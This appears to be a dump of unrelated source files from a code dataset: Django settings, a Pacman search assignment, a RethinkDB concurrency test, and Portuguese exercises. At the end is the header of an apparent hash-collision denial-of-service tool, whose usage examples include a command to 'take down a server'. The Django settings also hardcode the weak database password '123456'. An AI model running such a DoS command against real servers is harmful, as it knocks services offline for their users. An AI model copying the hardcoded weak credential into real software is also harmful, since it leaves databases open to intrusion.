# Application definition
INSTALLED_APPS = [
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'dreams',
'ckeditor',
'ckeditor_uploader',
]
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'website.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [os.path.join(BASE_DIR, 'templates').replace('\\','/')],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'website.wsgi.application'
# Database
# https://docs.djangoproject.com/en/3.0/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.mysql',
'NAME': 'djdb',
'USER': 'nimrod',
'PASSWORD': '123456',
'HOST': '127.0.0.1',
'PORT': '3306'
}
}
# Password validation
# https://docs.djangoproject.com/en/3.0/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/3.0/topics/i18n/
LANGUAGE_CODE = 'zh-hans'
TIME_ZONE = 'Asia/Shanghai'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/3.0/howto/static-files/
STATIC_URL = '/static/'
STATIC_ROOT = os.path.join(BASE_DIR,'static')
#media
MEDIA_URL = '/media/'
MEDIA_ROOT = os.path.join(BASE_DIR, 'media')
#配置ckeditor
CKEDITOR_UPLOAD_PATH = 'upload/'
|
[
"original_sin@163.com"
] |
original_sin@163.com
|
950cf5404ea2b75c9cadf94aa12dfbb274256e43
|
70ad3badf3fa6e2edf1889d8640f25a7ec0d9db1
|
/ros_catkin_ws/devel_isolated/rosparam/lib/python2.7/dist-packages/rosparam/__init__.py
|
979cdadf5761c2736f68558fa36dbd74e4175656
|
[] |
no_license
|
MathieuHwei/OldGaitMaven
|
758a937dfda2cf4f1aee266dbbf682ef34989199
|
873f7d9089c5d1c0772bd3447e2b0a31dac68b70
|
refs/heads/main
| 2023-06-17T18:40:06.230823
| 2021-07-19T23:08:20
| 2021-07-19T23:08:20
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,030
|
py
|
# -*- coding: utf-8 -*-
# generated from catkin/cmake/template/__init__.py.in
# keep symbol table as clean as possible by deleting all unnecessary symbols
from os import path as os_path
from sys import path as sys_path
from pkgutil import extend_path
__extended_path = "/home/pi/ros_catkin_ws/src/ros_comm/rosparam/src".split(";")
for p in reversed(__extended_path):
sys_path.insert(0, p)
del p
del sys_path
__path__ = extend_path(__path__, __name__)
del extend_path
__execfiles = []
for p in __extended_path:
src_init_file = os_path.join(p, __name__ + '.py')
if os_path.isfile(src_init_file):
__execfiles.append(src_init_file)
else:
src_init_file = os_path.join(p, __name__, '__init__.py')
if os_path.isfile(src_init_file):
__execfiles.append(src_init_file)
del src_init_file
del p
del os_path
del __extended_path
for __execfile in __execfiles:
with open(__execfile, 'r') as __fh:
exec(__fh.read())
del __fh
del __execfile
del __execfiles
|
[
"giahuy050201@gmail.com"
] |
giahuy050201@gmail.com
|
72522674426e18924bfd748a8caddecc1218f247
|
3282960df3031dfdf48dc7f3ac0433faff84b4f6
|
/Lista02/Ex005.py
|
0b0299ad9dd8756ccbcffe5b2f9f7991d2af5adb
|
[] |
no_license
|
fillipe-felix/ExerciciosPython
|
603120ea05dfcd627ae970f090df5f8072228706
|
119badd286c525397b56d514f8430c93a5eb2c4d
|
refs/heads/master
| 2020-03-23T02:48:26.656961
| 2018-07-15T18:19:08
| 2018-07-15T18:19:08
| 140,993,223
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 646
|
py
|
"""
Faça um programa para a leitura de duas notas parciais de um aluno.
O programa deve calcular a média alcançada por aluno e apresentar:
A mensagem "Aprovado", se a média alcançada for maior ou igual a sete;
A mensagem "Reprovado", se a média for menor do que sete;
A mensagem "Aprovado com Distinção", se a média for igual a dez.
"""
nota1 = float(input("Digite a primeira nota: "))
nota2 = float(input("Digite a segunda nota: "))
media = (nota1 + nota2) / 2
if(media == 10):
print("o aluno foi APROVADO COM DISTINÇÂO")
elif(media >= 7):
print("O aluno foi APROVADO")
elif(media < 7):
print("O aluno foi REPROVADO")
|
[
"felipesoares_1993@hotmail.com"
] |
felipesoares_1993@hotmail.com
|
c7f7d55da80fa96f610e72e41a113d2b31b4f2a4
|
cb6ea8cffe592d5ecbae3581c15143836d9714fd
|
/1. Search/search/searchAgents.py
|
efaa50237bafa0577d76b28568a39f67d1a9410b
|
[] |
no_license
|
pswaroopk/pacman-ai
|
a51d421f6b4ebe1f2f55830a0ef2a1c1f6ae8607
|
64b971d82db73780c5e6c9561666ba86f8ff314a
|
refs/heads/master
| 2020-06-27T22:34:02.231705
| 2017-07-13T03:23:10
| 2017-07-13T03:23:10
| 97,074,410
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 25,146
|
py
|
# searchAgents.py
# ---------------
# Licensing Information: You are free to use or extend these projects for
# educational purposes provided that (1) you do not distribute or publish
# solutions, (2) you retain this notice, and (3) you provide clear
# attribution to UC Berkeley, including a link to http://ai.berkeley.edu.
#
# Attribution Information: The Pacman AI projects were developed at UC Berkeley.
# The core projects and autograders were primarily created by John DeNero
# (denero@cs.berkeley.edu) and Dan Klein (klein@cs.berkeley.edu).
# Student side autograding was added by Brad Miller, Nick Hay, and
# Pieter Abbeel (pabbeel@cs.berkeley.edu).
"""
This file contains all of the agents that can be selected to control Pacman. To
select an agent, use the '-p' option when running pacman.py. Arguments can be
passed to your agent using '-a'. For example, to load a SearchAgent that uses
depth first search (dfs), run the following command:
> python pacman.py -p SearchAgent -a fn=depthFirstSearch
Commands to invoke other search strategies can be found in the project
description.
Please only change the parts of the file you are asked to. Look for the lines
that say
"*** YOUR CODE HERE ***"
The parts you fill in start about 3/4 of the way down. Follow the project
description for details.
Good luck and happy searching!
"""
from game import Directions
from game import Agent
from game import Actions
import util
import time
import search
class GoWestAgent(Agent):
"An agent that goes West until it can't."
def getAction(self, state):
"The agent receives a GameState (defined in pacman.py)."
if Directions.WEST in state.getLegalPacmanActions():
return Directions.WEST
else:
return Directions.STOP
#######################################################
# This portion is written for you, but will only work #
# after you fill in parts of search.py #
#######################################################
class SearchAgent(Agent):
"""
This very general search agent finds a path using a supplied search
algorithm for a supplied search problem, then returns actions to follow that
path.
As a default, this agent runs DFS on a PositionSearchProblem to find
location (1,1)
Options for fn include:
depthFirstSearch or dfs
breadthFirstSearch or bfs
Note: You should NOT change any code in SearchAgent
"""
def __init__(self, fn='depthFirstSearch', prob='PositionSearchProblem', heuristic='nullHeuristic'):
# Warning: some advanced Python magic is employed below to find the right functions and problems
# Get the search function from the name and heuristic
if fn not in dir(search):
raise AttributeError, fn + ' is not a search function in search.py.'
func = getattr(search, fn)
if 'heuristic' not in func.func_code.co_varnames:
print('[SearchAgent] using function ' + fn)
self.searchFunction = func
else:
if heuristic in globals().keys():
heur = globals()[heuristic]
elif heuristic in dir(search):
heur = getattr(search, heuristic)
else:
raise AttributeError, heuristic + ' is not a function in searchAgents.py or search.py.'
print('[SearchAgent] using function %s and heuristic %s' % (fn, heuristic))
# Note: this bit of Python trickery combines the search algorithm and the heuristic
self.searchFunction = lambda x: func(x, heuristic=heur)
# Get the search problem type from the name
if prob not in globals().keys() or not prob.endswith('Problem'):
raise AttributeError, prob + ' is not a search problem type in SearchAgents.py.'
self.searchType = globals()[prob]
print('[SearchAgent] using problem type ' + prob)
def registerInitialState(self, state):
"""
This is the first time that the agent sees the layout of the game
board. Here, we choose a path to the goal. In this phase, the agent
should compute the path to the goal and store it in a local variable.
All of the work is done in this method!
state: a GameState object (pacman.py)
"""
if self.searchFunction == None: raise Exception, "No search function provided for SearchAgent"
starttime = time.time()
problem = self.searchType(state) # Makes a new search problem
self.actions = self.searchFunction(problem) # Find a path
totalCost = problem.getCostOfActions(self.actions)
print('Path found with total cost of %d in %.1f seconds' % (totalCost, time.time() - starttime))
if '_expanded' in dir(problem): print('Search nodes expanded: %d' % problem._expanded)
def getAction(self, state):
"""
Returns the next action in the path chosen earlier (in
registerInitialState). Return Directions.STOP if there is no further
action to take.
state: a GameState object (pacman.py)
"""
if 'actionIndex' not in dir(self): self.actionIndex = 0
i = self.actionIndex
self.actionIndex += 1
if i < len(self.actions):
return self.actions[i]
else:
return Directions.STOP
class PositionSearchProblem(search.SearchProblem):
"""
A search problem defines the state space, start state, goal test, successor
function and cost function. This search problem can be used to find paths
to a particular point on the pacman board.
The state space consists of (x,y) positions in a pacman game.
Note: this search problem is fully specified; you should NOT change it.
"""
def __init__(self, gameState, costFn = lambda x: 1, goal=(1,1), start=None, warn=True, visualize=True):
"""
Stores the start and goal.
gameState: A GameState object (pacman.py)
costFn: A function from a search state (tuple) to a non-negative number
goal: A position in the gameState
"""
self.walls = gameState.getWalls()
self.startState = gameState.getPacmanPosition()
if start != None: self.startState = start
self.goal = goal
self.costFn = costFn
self.visualize = visualize
if warn and (gameState.getNumFood() != 1 or not gameState.hasFood(*goal)):
print 'Warning: this does not look like a regular search maze'
# For display purposes
self._visited, self._visitedlist, self._expanded = {}, [], 0 # DO NOT CHANGE
def getStartState(self):
return self.startState
def isGoalState(self, state):
isGoal = state == self.goal
# For display purposes only
if isGoal and self.visualize:
self._visitedlist.append(state)
import __main__
if '_display' in dir(__main__):
if 'drawExpandedCells' in dir(__main__._display): #@UndefinedVariable
__main__._display.drawExpandedCells(self._visitedlist) #@UndefinedVariable
return isGoal
def getSuccessors(self, state):
"""
Returns successor states, the actions they require, and a cost of 1.
As noted in search.py:
For a given state, this should return a list of triples,
(successor, action, stepCost), where 'successor' is a
successor to the current state, 'action' is the action
required to get there, and 'stepCost' is the incremental
cost of expanding to that successor
"""
successors = []
for action in [Directions.NORTH, Directions.SOUTH, Directions.EAST, Directions.WEST]:
x,y = state
dx, dy = Actions.directionToVector(action)
nextx, nexty = int(x + dx), int(y + dy)
if not self.walls[nextx][nexty]:
nextState = (nextx, nexty)
cost = self.costFn(nextState)
successors.append( ( nextState, action, cost) )
# Bookkeeping for display purposes
self._expanded += 1 # DO NOT CHANGE
if state not in self._visited:
self._visited[state] = True
self._visitedlist.append(state)
return successors
def getCostOfActions(self, actions):
"""
Returns the cost of a particular sequence of actions. If those actions
include an illegal move, return 999999.
"""
if actions == None: return 999999
x,y= self.getStartState()
cost = 0
for action in actions:
# Check figure out the next state and see whether its' legal
dx, dy = Actions.directionToVector(action)
x, y = int(x + dx), int(y + dy)
if self.walls[x][y]: return 999999
cost += self.costFn((x,y))
return cost
class StayEastSearchAgent(SearchAgent):
"""
An agent for position search with a cost function that penalizes being in
positions on the West side of the board.
The cost function for stepping into a position (x,y) is 1/2^x.
"""
def __init__(self):
self.searchFunction = search.uniformCostSearch
costFn = lambda pos: .5 ** pos[0]
self.searchType = lambda state: PositionSearchProblem(state, costFn, (1, 1), None, False)
class StayWestSearchAgent(SearchAgent):
"""
An agent for position search with a cost function that penalizes being in
positions on the East side of the board.
The cost function for stepping into a position (x,y) is 2^x.
"""
def __init__(self):
self.searchFunction = search.uniformCostSearch
costFn = lambda pos: 2 ** pos[0]
self.searchType = lambda state: PositionSearchProblem(state, costFn)
def manhattanHeuristic(position, problem, info={}):
"The Manhattan distance heuristic for a PositionSearchProblem"
xy1 = position
xy2 = problem.goal
return abs(xy1[0] - xy2[0]) + abs(xy1[1] - xy2[1])
def euclideanHeuristic(position, problem, info={}):
"The Euclidean distance heuristic for a PositionSearchProblem"
xy1 = position
xy2 = problem.goal
return ( (xy1[0] - xy2[0]) ** 2 + (xy1[1] - xy2[1]) ** 2 ) ** 0.5
#####################################################
# This portion is incomplete. Time to write code! #
#####################################################
#import pdb; pdb.set_trace()
class CornersProblem(search.SearchProblem):
"""
This search problem finds paths through all four corners of a layout.
You must select a suitable state space and successor function
"""
def __init__(self, startingGameState,costFn = lambda x: 1, start=None, visualize=True):
"""
Stores the walls, pacman's starting position and corners.
"""
self.gameState = startingGameState
self.walls = startingGameState.getWalls()
self.startingPosition = startingGameState.getPacmanPosition()
top, right = self.walls.height-2, self.walls.width-2
self.corners = ((1,1), (1,top), (right, 1), (right, top))
for corner in self.corners:
if not startingGameState.hasFood(*corner):
print 'Warning: no food in corner ' + str(corner)
self._expanded = 0 # DO NOT CHANGE; Number of search nodes expanded
# Please add any code here which you would like to use
# in initializing the problem
"*** YOUR CODE HERE ***"
self.costFn = costFn
self.visualize = visualize
# For display purposes
self._visited, self._visitedlist, self._expanded = {}, [], 0 # DO NOT CHANGE
def updateGoalState(self, state):
distance = 999999
goal = self.goal
for corner in self.corners:
currDist = util.manhattanDistance(state, corner)
if distance > currDist:
goal = corner
self.goal = goal
def getStartState(self):
"""
Returns the start state (in your state space, not the full Pacman state
space)
"""
"*** YOUR CODE HERE ***"
"""startState = ( (x,y), [False, False, False, False])"""
return (self.startingPosition, [False, False, False, False])
def isGoalState(self, state):
"""
Returns whether this search state is a goal state of the problem.
"""
"*** YOUR CODE HERE ***"
"""goal = ( (x,y), [True, True, True, True])"""
isGoal = state[1][0] and state[1][1] and state[1][2] and state[1][3]
# For display purposes only
if isGoal and self.visualize:
self._visitedlist.append(state[0])
import __main__
if '_display' in dir(__main__):
if 'drawExpandedCells' in dir(__main__._display): #@UndefinedVariable
__main__._display.drawExpandedCells(self._visitedlist) #@UndefinedVariable
return isGoal
def getSuccessors(self, state):
"""
Returns successor states, the actions they require, and a cost of 1.
As noted in search.py:
For a given state, this should return a list of triples, (successor,
action, stepCost), where 'successor' is a successor to the current
state, 'action' is the action required to get there, and 'stepCost'
is the incremental cost of expanding to that successor
"""
"""
My state space is defined as s[(x,y), [False, True, True, False]] based on the state of the corner visited or not
goal: s((x,y), [True, True, True, True])
start: s((x,y), [False, False, False, False])
"""
successors = []
for action in [Directions.NORTH, Directions.SOUTH, Directions.EAST, Directions.WEST]:
"*** YOUR CODE HERE ***"
""" Pack the status of the corners visited, if nextState is corner, mark that corner trues"""
x,y = state[0]
dx, dy = Actions.directionToVector(action)
nextx, nexty = int(x + dx), int(y + dy)
if not self.walls[nextx][nexty]:
nextState = (nextx, nexty)
corners = [False, False, False, False]
for i, corner in enumerate(self.corners):
corners[i] = nextState == corner or state[1][i]
cost = self.costFn(nextState)
successors.append( ((nextState,corners), action, cost ))
# Bookkeeping for display purposes
self._expanded += 1 # DO NOT CHANGE
if state[0] not in self._visited:
self._visited[state[0]] = True
self._visitedlist.append(state[0])
return successors
def getCostOfActions(self, actions):
"""
Returns the cost of a particular sequence of actions. If those actions
include an illegal move, return 999999. This is implemented for you.
"""
if actions == None: return 999999
x,y= self.startingPosition
for action in actions:
dx, dy = Actions.directionToVector(action)
x, y = int(x + dx), int(y + dy)
if self.walls[x][y]: return 999999
return len(actions)
def cornersHeuristic(state, problem):
"""
A heuristic for the CornersProblem that you defined.
state: The current search state
(a data structure you chose in your search problem)
problem: The CornersProblem instance for this layout.
This function should always return a number that is a lower bound on the
shortest path from the state to a goal of the problem; i.e. it should be
admissible (as well as consistent).
"""
corners = problem.corners # These are the corner coordinates
walls = problem.walls # These are the walls of the maze, as a Grid (game.py)
"""
Logic: Visit all the food positions and add them to the heuristic. It will give you the optimal path for
visiting all the corners and remove them from visitedList.
"""
if problem.isGoalState(state): return 0
visited = [False, False, False, False]
for i, bVal in enumerate(state[1]):
visited[i] = bVal
heuristic = 0
currPos = state[0]
while not all(visited):
listDist = []
for index, corner in enumerate(corners):
if not visited[index]:
listDist.append((corner, index, util.manhattanDistance(currPos, corner)))
#listDist.append( (corner, index, mazeDistance(currPos, corner, problem.gameState) ))
currPos, i, distance = min(listDist, key=lambda item:item[2])
visited[i] = True
heuristic += distance
return heuristic
class AStarCornersAgent(SearchAgent):
"A SearchAgent for FoodSearchProblem using A* and your foodHeuristic"
def __init__(self):
self.searchFunction = lambda prob: search.aStarSearch(prob, cornersHeuristic)
self.searchType = CornersProblem
class FoodSearchProblem:
"""
A search problem associated with finding the a path that collects all of the
food (dots) in a Pacman game.
A search state in this problem is a tuple ( pacmanPosition, foodGrid ) where
pacmanPosition: a tuple (x,y) of integers specifying Pacman's position
foodGrid: a Grid (see game.py) of either True or False, specifying remaining food
"""
def __init__(self, startingGameState):
self.start = (startingGameState.getPacmanPosition(), startingGameState.getFood())
self.walls = startingGameState.getWalls()
self.startingGameState = startingGameState
self._expanded = 0 # DO NOT CHANGE
self.heuristicInfo = {} # A dictionary for the heuristic to store information
self.testVal = 0
def getStartState(self):
return self.start
def isGoalState(self, state):
return state[1].count() == 0
def getSuccessors(self, state):
"Returns successor states, the actions they require, and a cost of 1."
successors = []
self._expanded += 1 # DO NOT CHANGE
for direction in [Directions.NORTH, Directions.SOUTH, Directions.EAST, Directions.WEST]:
x,y = state[0]
dx, dy = Actions.directionToVector(direction)
nextx, nexty = int(x + dx), int(y + dy)
if not self.walls[nextx][nexty]:
nextFood = state[1].copy()
nextFood[nextx][nexty] = False
successors.append( ( ((nextx, nexty), nextFood), direction, 1) )
return successors
def getCostOfActions(self, actions):
"""Returns the cost of a particular sequence of actions. If those actions
include an illegal move, return 999999"""
x,y= self.getStartState()[0]
cost = 0
for action in actions:
# figure out the next state and see whether it's legal
dx, dy = Actions.directionToVector(action)
x, y = int(x + dx), int(y + dy)
if self.walls[x][y]:
return 999999
cost += 1
return cost
class AStarFoodSearchAgent(SearchAgent):
"A SearchAgent for FoodSearchProblem using A* and your foodHeuristic"
def __init__(self):
self.searchFunction = lambda prob: search.aStarSearch(prob, foodHeuristic)
self.searchType = FoodSearchProblem
def foodHeuristic(state, problem):
# """
# Your heuristic for the FoodSearchProblem goes here.
#
# This heuristic must be consistent to ensure correctness. First, try to come
# up with an admissible heuristic; almost all admissible heuristics will be
# consistent as well.
#
# If using A* ever finds a solution that is worse uniform cost search finds,
# your heuristic is *not* consistent, and probably not admissible! On the
# other hand, inadmissible or inconsistent heuristics may find optimal
# solutions, so be careful.
#
# The state is a tuple ( pacmanPosition, foodGrid ) where foodGrid is a Grid
# (see game.py) of either True or False. You can call foodGrid.asList() to get
# a list of food coordinates instead.
#
# If you want access to info like walls, capsules, etc., you can query the
# problem. For example, problem.walls gives you a Grid of where the walls
# are.
#
# If you want to *store* information to be reused in other calls to the
# heuristic, there is a dictionary called problem.heuristicInfo that you can
# use. For example, if you only want to count the walls once and store that
# value, try: problem.heuristicInfo['wallCount'] = problem.walls.count()
# Subsequent calls to this heuristic can access
# problem.heuristicInfo['wallCount']
# """
position, foodGrid = state
'''Current position of the pacman'''
"""
Logic: We explore the nearest Food position and then find maximum distance and between two food positons from that
By covering the farthest distance, we can avoid visiting or increaing the heuristic for intermediate food positions
"""
if problem.isGoalState(state): return 0
foodList = []
#Find the closest position
for foodPos in foodGrid.asList():
if foodGrid[foodPos[0]][foodPos[1]]:
foodList.append( (foodPos, mazeDistance(foodPos, position, problem.startingGameState ) ) )
if len(foodList) == 0: return 0
nearPosition, nearDistance = min(foodList, key=lambda item:item[1])
#Find the maximum distance between two food points
maxDistance = max(mazeDistance(nearPosition, foodPos, problem.startingGameState) for foodPos, dist in foodList)
return nearDistance + maxDistance
class ClosestDotSearchAgent(SearchAgent):
"Search for all food using a sequence of searches"
def registerInitialState(self, state):
self.actions = []
currentState = state
while(currentState.getFood().count() > 0):
nextPathSegment = self.findPathToClosestDot(currentState) # The missing piece
self.actions += nextPathSegment
for action in nextPathSegment:
legal = currentState.getLegalActions()
if action not in legal:
t = (str(action), str(currentState))
raise Exception, 'findPathToClosestDot returned an illegal move: %s!\n%s' % t
currentState = currentState.generateSuccessor(0, action)
self.actionIndex = 0
print 'Path found with cost %d.' % len(self.actions)
def findPathToClosestDot(self, gameState):
"""
Returns a path (a list of actions) to the closest dot, starting from
gameState.
"""
# Here are some useful elements of the startState
startPosition = gameState.getPacmanPosition()
food = gameState.getFood()
walls = gameState.getWalls()
problem = AnyFoodSearchProblem(gameState)
"*** YOUR CODE HERE ***"
#return search.depthFirstSearch(problem)
return search.uniformCostSearch(problem)
util.raiseNotDefined()
class AnyFoodSearchProblem(PositionSearchProblem):
"""
A search problem for finding a path to any food.
This search problem is just like the PositionSearchProblem, but has a
different goal test, which you need to fill in below. The state space and
successor function do not need to be changed.
The class definition above, AnyFoodSearchProblem(PositionSearchProblem),
inherits the methods of the PositionSearchProblem.
You can use this search problem to help you fill in the findPathToClosestDot
method.
"""
def __init__(self, gameState):
"Stores information from the gameState. You don't need to change this."
# Store the food for later reference
self.food = gameState.getFood()
# Store info for the PositionSearchProblem (no need to change this)
self.walls = gameState.getWalls()
self.startState = gameState.getPacmanPosition()
self.costFn = lambda x: 1
self._visited, self._visitedlist, self._expanded = {}, [], 0 # DO NOT CHANGE
def isGoalState(self, state):
"""
The state is Pacman's position. Fill this in with a goal test that will
complete the problem definition.
"""
x,y = state
return self.food[x][y]
"*** YOUR CODE HERE ***"
util.raiseNotDefined()
def mazeDistance(point1, point2, gameState):
"""
Returns the maze distance between any two points, using the search functions
you have already built. The gameState can be any game state -- Pacman's
position in that state is ignored.
Example usage: mazeDistance( (2,4), (5,6), gameState)
This might be a useful helper function for your ApproximateSearchAgent.
"""
x1, y1 = point1
x2, y2 = point2
walls = gameState.getWalls()
assert not walls[x1][y1], 'point1 is a wall: ' + str(point1)
assert not walls[x2][y2], 'point2 is a wall: ' + str(point2)
prob = PositionSearchProblem(gameState, start=point1, goal=point2, warn=False, visualize=False)
return len(search.bfs(prob))
|
[
"swaroopkpydisetty@gmail.com"
] |
swaroopkpydisetty@gmail.com
|
c32fdb4787b51913dcb94e2128d2912fad182b06
|
3b871bdc672632e72bbdb72f98c914db660829b4
|
/Django_Project/Django_Project/asgi.py
|
5eb588cf3ef16a21bf99a45c2a9698189ff79917
|
[] |
no_license
|
JasbirCodeSpace/Django-Blog-Web-App
|
b1a58730a17c204fe4c8ad8ab4f3f1d47d5b30e1
|
6af67d03bbec997b972feacb2873efaa542becaa
|
refs/heads/master
| 2022-08-25T23:12:05.591494
| 2020-05-20T07:19:48
| 2020-05-20T07:19:48
| 264,860,882
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 411
|
py
|
"""
ASGI config for Blog project.
It exposes the ASGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/3.0/howto/deployment/asgi/
"""
import os
from django.core.asgi import get_asgi_application
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'Django_Project.settings')
application = get_asgi_application()
|
[
"shikhawat.jasbir@gmail.com"
] |
shikhawat.jasbir@gmail.com
|
f0c4e325811d89d928a9cf866949779e8aabab87
|
500ab8c56380741f8ec2e794e42deed6ee9c84df
|
/tests/test_concurrency.py
|
6ca2415aabb7f9516b38a70a1155ac504a23764f
|
[
"Apache-2.0"
] |
permissive
|
antonf/rethinktx
|
1686e11edf92a7d778681b5be526e55b9d11af1d
|
60bbe10ad46030cbcc7727b479ee5bd2355f1fcd
|
refs/heads/master
| 2020-12-05T16:18:36.610124
| 2017-03-19T23:25:43
| 2017-03-19T23:25:43
| 66,806,377
| 1
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 4,436
|
py
|
# Copyright 2016, Anton Frolov <frolov.anton@gmail.com>
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import logging
import random
import threading
import uuid
import rethinkdb
import rethinktx
import six
from . import mocks
import unittest
LOG = logging.getLogger(__name__)
NUM_ACCOUNTS = 10
NUM_ITERATIONS = 100
NUM_THREADS = 10
def perform_work(conn, account_ids):
for _ in six.moves.range(NUM_ITERATIONS):
acct_from_id, acct_to_id = random.sample(account_ids, 2)
try:
with rethinktx.Transaction(conn) as tx:
accounts_tbl = tx.table('accounts')
acct_from = accounts_tbl.get(acct_from_id)
acct_to = accounts_tbl.get(acct_to_id)
acct_from['balance'] -= 10
acct_to['balance'] += 10
accounts_tbl.put(acct_from_id, acct_from)
accounts_tbl.put(acct_to_id, acct_to)
except rethinktx.OptimisticLockFailure:
pass
except rethinkdb.ReqlAvailabilityError:
pass
class WorkerThread(threading.Thread):
def __init__(self, account_ids):
super(WorkerThread, self).__init__()
self.account_ids = account_ids
def run(self):
with mocks.get_connection() as conn:
perform_work(conn, self.account_ids)
class ConcurrentTransactionsTestCase(unittest.TestCase):
def setUp(self):
super(ConcurrentTransactionsTestCase, self).setUp()
with mocks.get_connection() as conn:
if isinstance(conn, mocks.ConnectionMock):
self.skipTest('Mocked connection not supported')
self._ensure_provisioned(conn)
self.account_ids = self._create_accounts(conn, NUM_ACCOUNTS)
@staticmethod
def _ensure_provisioned(conn):
def ignore_exc(fn, *args, **kwargs):
try:
return fn(*args, **kwargs)
except Exception:
LOG.debug('Ignored exception', exc_info=True)
ignore_exc(rethinkdb.db_create(conn.db).run, conn)
ignore_exc(rethinkdb.table_create('accounts').run, conn)
ignore_exc(rethinkdb.table_create('transactions').run, conn)
rethinkdb.table('accounts').delete().run(conn)
rethinkdb.table('transactions').delete().run(conn)
@staticmethod
def _create_accounts(conn, num_accounts):
account_ids = []
with rethinktx.Transaction(conn) as tx:
accounts_tbl = tx.table('accounts')
for i in six.moves.range(num_accounts):
key = str(uuid.uuid4())
account_ids.append(key)
accounts_tbl.put(key, {'index': i, 'balance': 0})
return account_ids
def _total_balance(self):
with mocks.get_connection() as conn:
total_balance = 0
with rethinktx.Transaction(conn) as tx:
accounts_tbl = tx.table('accounts')
for account_id in self.account_ids:
total_balance += accounts_tbl.get(account_id)['balance']
return total_balance
@staticmethod
def _show_stats():
with mocks.get_connection() as conn:
num_committed = rethinkdb.table('transactions')\
.filter({'status': 'committed'}).count().run(conn)
num_aborted = rethinkdb.table('transactions')\
.filter({'status': 'aborted'}).count().run(conn)
LOG.info('Committed transactions: %d; Aborted transaction: %d',
num_committed, num_aborted)
def test_concurrent_transactions(self):
workers = []
for _ in six.moves.range(NUM_THREADS):
worker = WorkerThread(self.account_ids)
workers.append(worker)
worker.start()
for worker in workers:
worker.join()
self._show_stats()
self.assertEqual(0, self._total_balance())
|
[
"frolov.anton@gmail.com"
] |
frolov.anton@gmail.com
|
7aa9a5b9b241ba9dc321a5f3fd7bbbd8dc028125
|
4a2b457f13628ebbf3cd379202b5354fa73bf1e5
|
/Python_3/Modulo 3/4 - Funções em Python/Exercício_100_Funções_para_sortear_e_somar.py
|
37bfc675f73b9a65e8824473012ac0d3d6939c9c
|
[
"MIT"
] |
permissive
|
Jose0Cicero1Ribeiro0Junior/Curso_em_Videos
|
abb2264c654312e6b823a3a9d4b68e0c999ada3f
|
b0bb4922ea40ff0146b5a7e205fe2f15cd9a297b
|
refs/heads/master
| 2022-12-19T19:18:53.234581
| 2020-10-23T12:29:09
| 2020-10-23T12:29:09
| 288,749,473
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 831
|
py
|
#Exercício Python 100: Faça um programa que tenha uma lista chamada números e duas funções chamadas sorteia() e somaPar(). A primeira função vai sortear 5 números e vai colocá-los dentro da lista e a segunda função vai mostrar a soma entre todos os valores pares sorteados pela função anterior.
from random import randint
from time import sleep
def sorteia(lista):
print('Soreteando 5 valores da lista: ', end='')
for cont in range(0,5):
n = randint(1,10)
lista.append(n)
print(f'{n} ', end='', flush=True)
sleep(0.3)
print('PRONTO!')
def somaPar(lista):
soma = 0
for valor in lista:
if valor % 2 == 0:
soma += valor
print(f'Somando os valores pares de {lista}, temos {soma}')
números = list()
sorteia(números)
somaPar(números)
|
[
"Jose0Cicero1Ribeiro0Junior@outlook.com"
] |
Jose0Cicero1Ribeiro0Junior@outlook.com
|
6cf0811024e03797d865654b2f6c18918e1db095
|
31948daa03278629f577fe9f6dcc19b6480604e7
|
/Hashtable.py
|
1c05fe90bb777f22d4b21f63c636581d14b938f1
|
[
"Unlicense"
] |
permissive
|
SpyEyeFamily/DarkSouL_ReaCt0r
|
4019d607630457ebb8bd0215dafcd39daee4d772
|
8cde5e03b2120237a345a92b20208efb287b6591
|
refs/heads/master
| 2020-12-28T20:20:18.755049
| 2016-09-17T23:17:46
| 2016-09-17T23:17:46
| 68,482,914
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 9,617
|
py
|
#! /usr/bin/env python
###########################
# Copyrights Please #
###########################
###########################
# My Original Code #
###########################
# WhoAmi :
#https://www.facebook.com/Gods.nd.kings
#https://www.facebook.com/clayteamwhoami
"""
Examples:
-) Make a single Request, wait for the response and save the response to output0.html
python Hashtable.py -u https://host/index.php -v -c 1 -w -o output -t PHP
-) Take down a server(make 500 requests without waiting for a response):
python Hashtable.py -u https://host/index.php -v -c 500 -t PHP
Changelog:
